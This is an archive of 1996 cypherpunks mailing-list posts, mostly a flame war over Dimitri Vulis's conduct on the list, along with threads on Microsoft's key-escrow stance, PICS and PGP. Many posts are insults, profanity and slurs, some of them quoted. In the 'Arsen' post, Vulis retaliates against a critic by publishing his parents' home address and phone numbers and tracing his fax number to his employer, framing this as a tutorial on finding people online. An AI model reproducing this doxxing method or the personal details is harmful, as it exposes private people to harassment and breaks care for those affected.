> those posted by you.  I am not saying that uncouth posts
> have not been made by others, but it is disingenuous for
> one to judge others by a standard that one does not apply
> to one's self.

You sound like someone who doesn't read this list, but only "reads the logs"
and sees the complaints from the likes of Arsen... I've recently quoted the
selected writings of Paul Bradley, most of which were far more "uncultured;
crude; or boorish" that anything I ever said. For example:

]From: paul@fatmans.demon.co.uk
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Date: Sat, 21 Sep 1996 17:37:23 +0000
]Subject: Re: CIA hacked
]Message-Id: <843401979.17072.0@fatmans.demon.co.uk>
]
]> >Dr. John M. Grubor created the 'net.
]>
]> Who created you? You tub of shit?
]
]
]Fuck you and fuck your cheap ass fucked up life motherfucker (look
]for the fuck redundancy index here, should be an interesting figure,
]motherfucker)
]
]good day to you
<sig>

(The "tub of shit" quote isn't from me either.)

Here's what Graham-John Bullers of alt.2600.moderated infamy said:

]Date: Mon, 2 Dec 1996 12:15:35 -0700 (MST)
]From: Graham-John Bullers <real@freenet.edmonton.ab.ca>
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Subject: Re: Hurray! A good example of rational thinking ...
]In-Reply-To: <sJaByD32w165w@bwalk.dm.com>
]Message-Id: <Pine.A41.3.95.961202121501.43508D-100000@fn2.freenet.edmonton.ab.ca>
]
]GROW UP CUNT
]
]
]        http://www.freenet.edmonton.ab.ca/~real/index.html
]
]                                          : real@freenet.edmonton.ab.ca
]Graham-John Bullers                  email
]                                          : ab756@freenet.toronto.on.ca

(I had dozens of these, but I only saved some.)

How do you expect one to carry out a _polite conversation with these "punks"?
I mostly choose to ignore this lot, or to re-state my opinion of them.

> > What logic? "Cypher punks" such as Paul Bradley are incapable of
> > discussing a technical topic (such as Don Wood's IPG proposal) without
> > putting "(spit)" after Don's name
>
> I could be wrong, but I believe this was done as an
> intentional parody of your own similar posts. If it is
> illogical for Paul Bradley to do this, does it not follow
> that is was illogical when you did it as well?

Paul tries to suppress the discussion of crypto on this list. Before I gave up
on this list completely, I used to think that it's a veru evil thing to do.
Even if there are problems with Don Wood's IPG cryptoscheme (something I don't
know to be true until I find the time to look at it myself), it's outright
evil to harrass Don the way Paul did. It's clear that Don knows more about the
field of cryptography than most people remaining on this mailing list. If
indeed there are holes in his scheme (and I don't know that), it certainly is
no excuse to submit him to the kind of verbal abuse that he's been subjected
to on this list. Would you submit the authors of the knapsack scheme to the
same kind of abuse because it was broken? In fact, how many people are there
still on this list who know what the knapsack scheme is?

> It is obvious to me that you are an intelligent person.
> I am concerned, however, with your apparent intellectual
> dishonesty.  It would appear that you know perfectly well

You want intellectual dishonesty - look upstairs from toad.com.

> that your posts serve no purpose in the cause of promoting
> privacy through the use of cryptography.  It is hard to
> draw any other conclusion then that you are intentionally
> being provocative for the purpose of disrupting the work
> of this list.  If this is not so, I apologize, but how
> else can we judge your actions?  Please step outside of
> yourself for a moment and give us an honest self-assessment
> of your behavior and the motives behind it.

The work of this list appears to be character assassination. If people like
Paul Bradley and Tim May insist on slandering people and trying to harm their
professional reputations (see the thread on "don't hire" lists), I will do my
best to defend them and their freedom of speech, and to expose the likes of
Paul Bradley - an ignorant buffoon out to silence anyone who knows more about
the field than he does.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 4 Dec 1996 21:21:09 -0800 (PST)
To: logos <logos@c2.net>
Subject: Re: Logos -vs- Vulis
In-Reply-To: <Pine.BSF.3.91.961204070229.25120B-100000@blacklodge.c2.net>
Message-ID: <32A65894.1A5@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


logos wrote:
> Dimitri Vulis wrote:
> > Lame losers who call themselves "cypher punks" and bend
> > over for John Gilmore.

>      It is obvious that you, Dimitri Vulis, intend to be
> disruptive to the operation of this list. I have politely
> asked you several specific questions about your motives.

Sorry for the noise, but could Logos be specific as to the fallacy in
each item he/she is addressing?  I thought that was the purpose of
the Logos character.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Wed, 4 Dec 1996 18:12:15 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: Microsoft & Key Escrow
Message-ID: <01BBE227.C266CEA0@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


Following are some of the relevent snippets from
http://www.microsoft.com/intdev/security/export/exporfaq-f.htm.
The comments in square brackets are mine.

---cut here---
What is Microsoft's position on supporting key escrow?

Key escrow encryption is not a market-driven solution and it raises serious privacy concerns for many customers. It is also new, undeveloped, untested, and uncosted, and it will take a long time to be worked out. Additionally, customers have expressed hesitation about mandatory key escrow, especially if they have to give the keys to the government or a government-selected third party. Therefore, we are not actively adding support for key escrow in our products and technologies. 

[About as good as we can ask for.  I would, however, like that last sentence
 better if the word 'actively' was missing.]

Shouldn't the U.S. government be able to access information that could prevent terrorist acts and crime?

Strong non-key escrow encryption is already available from retail outlets, foreign companies, and off the Internet. Thus the U.S. government is already having--and will continue to have--a harder time in the future accessing plain text regardless of U.S. export restrictions. 

[I suppose it would be too much to expect a third sentence
 reading.  'This is a good thing.']

What is key recovery? How does it relate to key escrow?

Market-driven data recovery refers to a product feature that allows users to maintain a spare private encryption key in a safe place. Generally, a data recovery system escrows a copy of the session key with the message or file and the user (or perhaps his employer) controls the decision whether to utilize this feature. With key escrow the U.S. government holds or has access to a user's private encryption key. 

It is not yet clear whether such systems are exportable. In the October 1 announcement, the U.S. government referred to "key recovery" without defining it; in all likelihood, however, they still have in mind government key escrow, and not market-driven data recovery. 

[Hmm... it's just possible that Microsoft's spin doctors are
 better than those of the US government.  Perhaps they can
 sell the world on their definition of 'key recovery' instead of
 the one we know the TLAs intended.]
---cut here---

regards,
-Blake






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 4 Dec 1996 19:24:45 -0800 (PST)
To: rcgraves@ix.netcom.com (Rich Graves)
Subject: Re: PRIVACY: X-No-Archive and mail.cypherpunks
In-Reply-To: <32A5DC5B.3411@ix.netcom.com>
Message-ID: <199612050317.VAA18674@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


X-No-Archive: yes

Rich Graves wrote:
> 
> FYI, the search engines that honor an X-No-Archive header also tend to 
> skip posts with X-No-Archive: yes as the first line of the body of the 
> message.

But it is so simple to modify the reposting program...

> IMO this is preferable anyway, because it lets your readers know what 
> you're doing.

To me, it is easier to define X-No-Archive: yes once and for all.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The CNET newsletter <dispatch@cnet.com>
Date: Wed, 4 Dec 1996 21:43:57 -0800 (PST)
To: Multiple recipients of list NEWS-DISPATCH             <NEWS-DISPATCH@DISPATCH.CNET.COM>
Subject: NEWS.COM Dispatch, Dec. 4, 1996
Message-ID: <199612050528.VAA11544@cappone.cnet.com>
MIME-Version: 1.0
Content-Type: text/plain


****************************************

NEWS.COM DISPATCH
Wednesday, December 4, 1996
San Francisco, California, USA

***************************************

WELCOME!

***************************************

NEWS.COM DISPATCH summarizes the up-to-the minute technology news
presented by NEWS.COM. It tempts readers with coverage of today's
hottest stories, news in the making, (in)credible rumors, and
other indispensable information.

For complete versions of the stories updated all day long, head
over to:

   http://www.news.com/?nd


***************************************

SCOOPS AND TOP STORIES
     Gore gets an earful from cybermoguls on encryption policy
     Steve Jobs tells tech crowd, "It's the content, stupid!"
     Microsoft's Ballmer takes verbal digs at NC-happy competitors

ANNOUNCEMENTS
     An easy way for you to customize NEWS.COM
     Send us your questions, comments, flotsam, and jetsam
     How to subscribe and unsubscribe


***************************************

SCOOPS AND TOP STORIES


GORE GETS AN EARFUL FROM CYBERMOGULS ON ENCRYPTION POLICY
Al Gore, the ultimate information highway cheerleader, won't like
what he sees in his in-box: stern criticism of the White House's
encryption policy. The Business Software Alliance's letter says
Bill and Al are heading in the "absolute wrong direction." But
giving is better than receiving (it is, after all, the holidays),
and the industry group offers five ways out of the morass.

   http://www.news.com/News/Item/0%2C4%2C5909%2C00.html?nd


STEVE JOBS TELLS TECH CROWD, "IT'S THE CONTENT, STUPID!"
The man who helped launch the computer revolution of the 1980s is
now exhorting creative types to take their rightful place at the
digital table. Citing blockbuster films Toy Story, Jobs preached
that only the combination of technology AND creativity will get
the consumers' juices flowing.

   http://www.news.com/News/Item/0%2C4%2C5913%2C00.html?nd


MICROSOFT'S BALLMER TAKES VERBAL DIGS AT NC HAPPY COMPETITORS
Perhaps you thought Microsoft was worried, or at least cranky,
about all the predictions Ellison and company have been making
about the network computer dethroning the PC as machine du jour?
Not at all. In fact, says Steve Ballmer, "it's fantastic!"

   http://www.news.com/News/Item/0%2C4%2C5896%2C00.html?nd


***************************************

ANNOUNCEMENTS

AN EASY WAY FOR YOU TO CUSTOMIZE NEWS.COM
So many bits, so little time? Sounds like you need Custom News.
Identify topics, keywords, or sections you're interested in, and
Custom News will a create a page of headlines and summaries for
stories matching your criteria. Check it out at:

http://www.news.com/Personalization/Entry/1%2C21%2C%2C00.html?nocache=1


SEND US QUESTIONS, COMMENTS, FLOTSAM, AND JETSAM
If you have any questions, suggestions or remarks, send us a
message:

   newsdispatch@cnet.com


HOW TO SUBSCRIBE AND TO UNSUBSCRIBE
To subscribe to News Dispatch: Send mail to
listserv@dispatch.cnet.com with the message:

   subscribe news-dispatch (your name)

in the message body. To unsubscribe send the message:

   signoff news-dispatch


***************************************

CNET: The Computer Network
   http://www.cnet.com/
   http://www.news.com/
   http://www.gamecenter.com/
   http://www.download.com/
   http://www.search.com/
   http://www.shareware.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Dec 1996 19:40:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Logorrhea
In-Reply-To: <Pine.BSF.3.91.961204070229.25120B-100000@blacklodge.c2.net>
Message-ID: <yJZFyD76w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


logos <logos@c2.net> writes:
>
> Dimitri Vulis wrote:
>
> > Lame losers who call themselves "cypher punks" and bend
> > over for John Gilmore.
>
>      It is obvious that you, Dimitri Vulis, intend to be
> disruptive to the operation of this list. I have politely
> asked you several specific questions about your motives.

Hmm, I looked at my mailbox and haven't found any questions.

>      I am politely asking you again, Dimitri Vulis, why are
> you unwilling to rationally and politely discuss whatever
> grievances you have with specific Cypherpunks? I believe
> you are capable of rational discourse, you allegedly have
> some academic credentials so you must have a passing
> familiarity with formal debate. Why are you unwilling to
> join this discussion with anything other than immature
> insults? If the facts are on your side, a reasonable

I've been participating in this discussion for a considerable period of time
before being attacked by Tim May for no apparent reason (other than his hatred
for Jews and for immigrants). I tried unsuccessfully to convince him off-list
that his attacks are off-topic and false (he attributed to me various bizarre
stuff that I never said). Since he insists on continuing his attacks on my
character, I will point out that he's a liar and a racist.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Dec 1996 19:41:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Arsen
In-Reply-To: <Pine.SUN.3.91.961204124339.25133A-100000@beast.brainlink.com>
Message-ID: <7RZFyD77w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


> Just ignore them - Vulis is on the rag again.  Someone please buy Vulis a
> box of anal tampons so he can calm down.

This reminds me how someone posted an anonymous message to this list calling
Matt Blaze a "homosexual Jew" and Tim Scanlon (another lying Tim) immediately
announced that I must be its author. He lied, of course, being a "cypher punk".

Anyway, seeing that Arsen posted the above obscenities during duty hours, I
figured I'll post another tutorial on tracking down information on the 'net.

Arsen vainly insisted on listing his name in InterNIC's database as RA1215
(unusual for someone supposedly interested in privacy). Arsen listed a phone
number (+1 718 786 4227) which is apparently at his parents' residence (48-21
40th St, Apt 2B, Calvary, NY 11104-4111) and a fax number (+1 212 725 6559).

The fax number is in Manhattan area code. A good conjecture is that it belongs
to some sort of business, and that the business's main number ends with a 0.

Indeed, calling +1 212 725 6550 (Arsen's listed fax number, 9 replaced by a 0)
and talking to a nice young lady reveals that this phone number belongs to the
Web designer EarthWeb, LLC; that they're at 3 Park Ave, 38th floor, New York,
NY 10016; that the partnership's principals are:
* Jack D. Hidary, president and CEO, <jack@earthweb.com>
* Murray Hidary, senior vice president for operations, <murray@earthweb.com>
* Nova Spivack, senior vice president for marketing, <nova@earthweb.com>
and that Arsen is their associate network administrator.

That's how much one can learn just from the fax number in one's InterNIC entry.

For the logorrhetics' reading pleasure, I'll quote some of Arsen's earlier
writings on the "cypher punks" mailing list:

]Actually, unlike you, I do feel sorry for you, for you truly have no life
]and have nothing better to do than to start flame wars and such.  Do
]yourself a favor, get a real life.  Go get off your fat ass and do
]something with yourself other than masturbating.
...
]You wouldn't know what a life is if one came up to you and bit you on your
]ass. Oh tell us oh great one, and what is it that you know?  But spare us
]the flames and hate.  We already know that you are an asshole, of that
]there is little doubt.  What is at doubt is your degree, or is it a
]pedigree?  Shower us with your knowledge if you have any, for it is
]apparent that dazzling us with your bullshit isn't working.
...
]And what by your definition is your level of life if all your output
]seems to be nothing more than flames and flame bait?  How much of a loser
]are you to resort to anonymous daily warnings about Tim?  Just how off
]topic and stupid was your message when you posted it?  Just how many
]plates of pork and beans do you eat each day to keep up your innane level
]of flatulence?
...
]Apparently that "Doctorhood" of yours is good only for masturbatory self
]congratulations, and when nobody pays attention to it, you turn around and
]put others down so that in your oppinion, such as it is, you come out
]smelling like roses.  Buddy, I've news for you, you aren't fooling anyone.
]You are the total absolute embodyment of shit.  No, before you
]congratulate yourself on your achievement of shithood, you aren't even
]even human or dog shit, no.  You are the essence of amoeba shit.  The
]lowest of the low. You've a long way to go before you will ever achive
]the status of high human shit.  But I must admit, you certainly know how
]to strive for that goal.  It's too bad you'll never be more than low
]grade microscopic shit though.
]...
]And for that, you have my deepest condolances.  At least I hope this
]comforts you in your lack of life, for assuredly you haven't much of one.
]At least at a minimum, if you get nothing else from this message, you'll
]get a tenth of an ounce of pitty.
]...
]And maybe someday, if you are really really good you might even achive
]rat shitdom.  Then we'll be real proud of you for being rat shit, but
]until that time, strive hard and work long hours.  Hey, and when you reach
]rat shitdom and become emeritus ratus shitus, we'll throw you a party!

Aren't the "cypher punks" a polite lot?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 4 Dec 1996 21:33:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Microsoft & Key Escrow
In-Reply-To: <01BBE227.C266CEA0@bcdev.com>
Message-ID: <v03007802aecc0b49fa9b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:49 PM -0600 12/4/96, Igor Chudov @ home wrote:
>this is unfortunate -- key escrow is a very good thing as long
>as it is not mandated by law.

Agreed, except that I would call voluntary, corporate plans "key recovery,"
not "key escrow." (The government now calls their non-voluntary system "key
recovery" as well, so the term is still overloaded.)

The concern many of us have had for several years (*) is that such schemes
are very dangerous, acting as a kind of "sword of Damocles" over our heads.
A widely-used, government-encouraged key recovery program, once deployed,
could too easily be made mandatory. Hence our interest in sabotaging or
subverting such schemes, to preserve additional degrees of freedom should a
ban be attempted.

And clearly even corporate key recovery schemes are not really designed to
be robust against willful attempts to subvert the recovery of plaintext.
The intention is to deal with forgetful employees, departed employees,
etc., not those who attempt to, for example, superencrypt their
communications.

Furthermore--and this has been noted many, many times--there are
essentially no plausible situations in which either _corporations_ or
_individuals_ would need or want key recovery for *communications*. After
all, individuals or employees within corporations have (possibly) encrypted
files on their disks, including outgoing and incoming e-mail. They use
communications cryptography--PGP, whatever--to guard against _interception_
by other corporations, other individuals, or governments (including their
own). For example, they encrypt using the public key of their recipient.

So, why would someone practicing such communications security care about
key recovery, for the communications? Only one word suffices here: "Duh."

On other hand, _governments_ are thwarted by such communications security,
and this is the real motivation for key recovery. Louis Freeh, Jim
Kallstrom, Dorothy Denning, and others have said as much.


>any reasonable employer concerned about secrecy and recoverability
>of his data should use key escrow solutions for their employees'
>encryption.


But certainly not for *communications security*. Corporations such as
Microsoft would do well, I think, to explicitly point this out and to make
clear that corporate key recovery products will be oriented toward key
recovery for files stored on corporate computers--which would presumably
include the originally-generated plaintext messages sent to other sites or
users--and not oriented toward mandating the forms the _communications_
must take.

Sadly, most journalists who write about crypto have failed to pick up on
this important point....I guess writing articles about the "death of the
Cypherpunks list" is more important (and keeps Vulis feeling good about
himself).

Oh well.

(* Just as the Cypherpunks list was being formed, circa October 1993, I
posted an article to sci.crypt about "A Trial Balloon to Ban Encryption?"
This was based on some views expressed by Prof. Dorothy Denning, who even
then, six months before Clipper, was making arguments for government access
to keys. I anticipated a government move to limit public key encryption,
using some form of key escrow. Sure enough....)

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 4 Dec 1996 19:57:59 -0800 (PST)
To: blake@bcdev.com (Blake Coverett)
Subject: Re: Microsoft & Key Escrow
In-Reply-To: <01BBE227.C266CEA0@bcdev.com>
Message-ID: <199612050349.VAA18948@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


this is unfortunate -- key escrow is a very good thing as long
as it is not mandated by law.

any reasonable employer concerned about secrecy and recoverability
of his data should use key escrow solutions for their employees' 
encryption.

igor

Blake Coverett wrote:
> 
> Following are some of the relevent snippets from
> http://www.microsoft.com/intdev/security/export/exporfaq-f.htm.
> The comments in square brackets are mine.
> 
> ---cut here---
> What is Microsoft's position on supporting key escrow?
> 
> Key escrow encryption is not a market-driven solution and it raises =
> serious privacy concerns for many customers. It is also new, =
> undeveloped, untested, and uncosted, and it will take a long time to be =
> worked out. Additionally, customers have expressed hesitation about =
> mandatory key escrow, especially if they have to give the keys to the =
> government or a government-selected third party. Therefore, we are not =
> actively adding support for key escrow in our products and technologies. =
> 
> 
> [About as good as we can ask for.  I would, however, like that last =
> sentence
>  better if the word 'actively' was missing.]
> 
> Shouldn't the U.S. government be able to access information that could =
> prevent terrorist acts and crime?
> 
> Strong non-key escrow encryption is already available from retail =
> outlets, foreign companies, and off the Internet. Thus the U.S. =
> government is already having--and will continue to have--a harder time =
> in the future accessing plain text regardless of U.S. export =
> restrictions.=20
> 
> [I suppose it would be too much to expect a third sentence
>  reading.  'This is a good thing.']
> 
> What is key recovery? How does it relate to key escrow?
> 
> Market-driven data recovery refers to a product feature that allows =
> users to maintain a spare private encryption key in a safe place. =
> Generally, a data recovery system escrows a copy of the session key with =
> the message or file and the user (or perhaps his employer) controls the =
> decision whether to utilize this feature. With key escrow the U.S. =
> government holds or has access to a user's private encryption key.=20
> 
> It is not yet clear whether such systems are exportable. In the October =
> 1 announcement, the U.S. government referred to "key recovery" without =
> defining it; in all likelihood, however, they still have in mind =
> government key escrow, and not market-driven data recovery.=20
> 
> [Hmm... it's just possible that Microsoft's spin doctors are
>  better than those of the US government.  Perhaps they can
>  sell the world on their definition of 'key recovery' instead of
>  the one we know the TLAs intended.]
> ---cut here---
> 
> regards,
> -Blake
> 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.net>
Date: Wed, 4 Dec 1996 22:11:35 -0800 (PST)
To: ares@imaginet-us.net
Subject: Re: PGP 5.0??
In-Reply-To: <m0vVWwZ-007WwzC@kani.wwa.com>
Message-ID: <Pine.BSF.3.91.961204220740.16825A-100000@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


Ares GodOfWar <ares@imaginet-us.net> writes:
 
>lo all
>
>i am in a terrible mess...
>can someone inform me as to the location of PGP 5.0 shareware??
>i need it asap ;]
 
Telnet to: all.net

login: your name
Password: guest

Good Luck!

William Knowles
erehwon@c2.net


--
William Knowles    <erehwon@c2.net>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--
Sitting on the razors edge of freedom of speech.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: logos <logos@c2.net>
Date: Wed, 4 Dec 1996 22:12:26 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: Intellectual dishonesty
Message-ID: <Pine.BSF.3.91.961204211709.13090A-100000@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain



Dimitri Vulis wrote:

> > LOGOS <logos@c2.net> writes:
> >
> >    Yes, that and other catagorizations which are
> > irrelevant to the primary focus of this list.

> It's funny that you should say this, since Tim May and other prominent
> "cypher punks" devote so much attention to their "enemies'" ethnicity and
> religion. Recall the attacks on "crazy Russians", "immigrants who abuse
> American freedoms", the recent attack on Hispanics, the attacks on Jews,
> the attacks on Mormons...

     Yes I do recall some of those statements.  Since you
feel that those 'attacks' were inappropriate, is it not
intellectually dishonest to engage in such 'attacks' 
yourself?  If it was wrong for them, how can it be right
for you?  
     If your age, sex, sexual preference, race, ethnicity,
mother tongue, nationality, etc. are irrelevant to the 
discussions on this list, what possible justification is
there for you to raise such issues in my case? 

I wrote:

> > In any case, it is a good example of the informal logical
> > fallacy of 'over generalization'. As I understand it, there
> > are circa 1000 people subscribed to Cypherpunks.  To paint
> > an entire group with such a characterization is both
> > illogical and unfair. I also question your use of the

To which you replied:

> What about painting entire ethnic or religion groups, as Timmy May does?

     This is truly a non-sequitor. I am sure you know 
better than this.  Tim May is responsible for his actions;
you are responsible for yours. Taken to it's logical
conclusion, if Tim were to murder a random Russian 
immigrant, you would be justified in killing a random
native American.  
     As I said before, you are obviously too smart to 
seriously entertain such an irrational viewpoint. Thus
it is difficult to draw any conclusion other then that
you are rationalizing your inappropriate behaviour.

> You sound like someone who doesn't read this list, but only "reads the 
> logs" and sees the complaints from the likes of Arsen...

     Actually, I read it quite thoroughly.

> I've recently quoted the selected writings of Paul Bradley, most of 
> which were far more "uncultured; crude; or boorish" that anything I 
> ever said. For example: [elided]

     Again, would you please explain the logical basis
for committing the same abuses you cite from others?  I
would think you would seek to distance yourself from such
behavior, rather than to exceed it.  The inappropriate 
abuse of the 1000 members of this list by others can in no 
way excuse their further abuse by you.  

> > It is obvious to me that you are an intelligent person.
> > I am concerned, however, with your apparent intellectual
> > dishonesty.  It would appear that you know perfectly well

> You want intellectual dishonesty - look upstairs from toad.com.

     No, I want intellectual honesty. But even if I look 
upstairs from toad.com and find intellectual dishonesty, 
how would that in any way mitigate your apparent 
intellectual dishonesty? Are you arguing that one is
somehow dependent on, or the result of the other?  This
makes no sense to me.  Does it to you? 

> > that your posts serve no purpose in the cause of promoting
> > privacy through the use of cryptography.  It is hard to
> > draw any other conclusion then that you are intentionally
> > being provocative for the purpose of disrupting the work
> > of this list.  If this is not so, I apologize, but how
> > else can we judge your actions?  Please step outside of
> > yourself for a moment and give us an honest self-assessment
> > of your behavior and the motives behind it.

> The work of this list appears to be character assassination. If people like
> Paul Bradley and Tim May insist on slandering people and trying to harm 
> their professional reputations (see the thread on "don't hire" lists), 
> I will do my best to defend them and their freedom of speech,...

     The above does not appear to make sense. Did you leave
something out? It is unclear to me how rude and provocative
personal attacks and broad, unkind generalizations about 
Cypherpunk list members defends freedom of speech, protects
privacy or promotes cryptography. Would you please explain
the rationale behind your actions?

Logos out




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 4 Dec 1996 22:23:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: W3C Picks PICS for Censorship
Message-ID: <1.5.4.32.19961205062304.003a76c8@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> W3C ISSUES PICS AS A RECOMMENDATION; PICS READY FOR WIDESPREAD
   ADOPTION; ENABLING USERS TO FILTER INTERNET CONTENT WITHOUT
   CENSORSHIP - The World Wide Web Consortium today endorsed the
   Platform for Internet Content Selection specifications as a W3C
   Recommendation. This Recommendation represents the W3C's highest
   "Stamp of Approval." It signifies that PICS specifications are stable
   ... [Business Wire, 854 words]

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
#     (If this is posted to cypherpunks, I'm currently lurking from fcpunx,
#     so please Cc: me on replies.  Thanks.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bobbi <rkluge@nunic.nu.edu>
Date: Wed, 4 Dec 1996 22:27:19 -0800 (PST)
To: Brent Cunningham <bcungham@entrust.com>
Subject: Re: Why Cryptography is harder than it looks?
In-Reply-To: <c=CA%a=_%p=NorTel_Secure_Ne%l=GRANNY-961205002900Z-1947@bwdldb.ott.bnr.ca>
Message-ID: <Pine.GSO.3.95.961204222832.8630D-100000@nunic.nu.edu>
MIME-Version: 1.0
Content-Type: text/plain



try http://www.counterpane.com/



On Wed, 4 Dec 1996, Brent Cunningham wrote:

~~Can you please either:  1) email me a copy; or 2) give me a pointer as
~~to where I can get a copy; of Bruce Schneier's paper on "Why
~~Cryptography is harder than it looks?"
~~
~~




bobbi kluge             voice: 619.945.6248                                     
rkluge@nunic.nu.edu     fax: 619.945.6397
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj  "Once more 
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1   into the
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)     breach.." WS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: logos <logos@c2.net>
Date: Wed, 4 Dec 1996 22:31:56 -0800 (PST)
To: dthorn@gte.net
Subject: Re: Logos -vs- Vulis
Message-ID: <Pine.BSF.3.91.961204221926.13090D-100000@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain



Dale Thorn wrote:

> Dimitri Vulis wrote:
> > Lame losers who call themselves "cypher punks" and bend
> > over for John Gilmore.

>      It is obvious that you, Dimitri Vulis, intend to be
> disruptive to the operation of this list. I have politely
> asked you several specific questions about your motives.

Sorry for the noise, but could Logos be specific as to the fallacy in
each item he/she is addressing?  I thought that was the purpose of
the Logos character.

     I indicated in my original post that I would be
addressing both logic and decorum. With regard to the
questions above, I was asking Dimitri Vulis to give a
more detailed explanation of his thinking process.  Once
some of his assumptions are made explicit, it will be
easier to make meaningful comments about the rigor of his
reasoning process.
     It was never my intent to nit pick about every bit
of sloppy reasoning by every poster to Cypherpunks. Rather,
I am trying to elevate the general level of discourse via
selective commentary and (hopefully) by example.
     If Dale Thorn, or anyone else, feels that a more 
rigourous attention to logic and/or decorum is called for,
I heartily welcome your participation.

Logos out




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Dec 1996 20:00:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <199612021122.MAA02666@digicash.com>
Message-ID: <2D3FyD78w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bryce <bryce@digicash.com> writes:
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> > > Rule 2:  Don't forward articles from other forums to
> > > cypherpunks.  We can find it ourselves the same place you did
> >
> > This is not universally true. Everyone doesn't have access to
> > a functional News server or even to the Web, and some interesting
> > stuff could come from closed commercial sites etc.
>
> Yeah, my "rules" are mainly to intimidate newbies into holding
> still long enough to be properly socialized.  Only the
> Meta-Rule is inviolate.

Thank you, Bryce, for an excellent quote. Indeed "cypher punks" control
freaks are into indimidation and power games. No wonder there's so much
intersection between the "cypher punks" and the Usenet news.* Cabal!

"Cypher punks" have degenerated into an inbred cybermob whose goal in life
is to "enforce" the "rules" that apply to "newbies" (more Cabal-speak) but
not to the "in-crowd".

Paul Bradley, the vitriolic flamer, is a good example of a "cypher punk".
Paul doesn't know much about cryptography, but he's been harrassing Don Wood
because Don Wood dared propose a cryprosystem. I haven't examined Don's
proposal and don't know how good it is. Paul apparently FTP's Don's files
but lacked the technical knowledge to understand the proposal. Paul first
posted nonsensical attacks on Don's proposal (discussing a brute-force
attack on one-time pad). When several people, including myself, pointed out
that Paul was writing nonsense, Paul claimed that he mistyped "one-time pad"
for "stream cypher". Although it's an entirely different animal, Paul's
writings were still nonsense, even if one substituted "stream cypher" for
"one-time pad". After being exposed as ignoramus, Paul abandoned attempts at
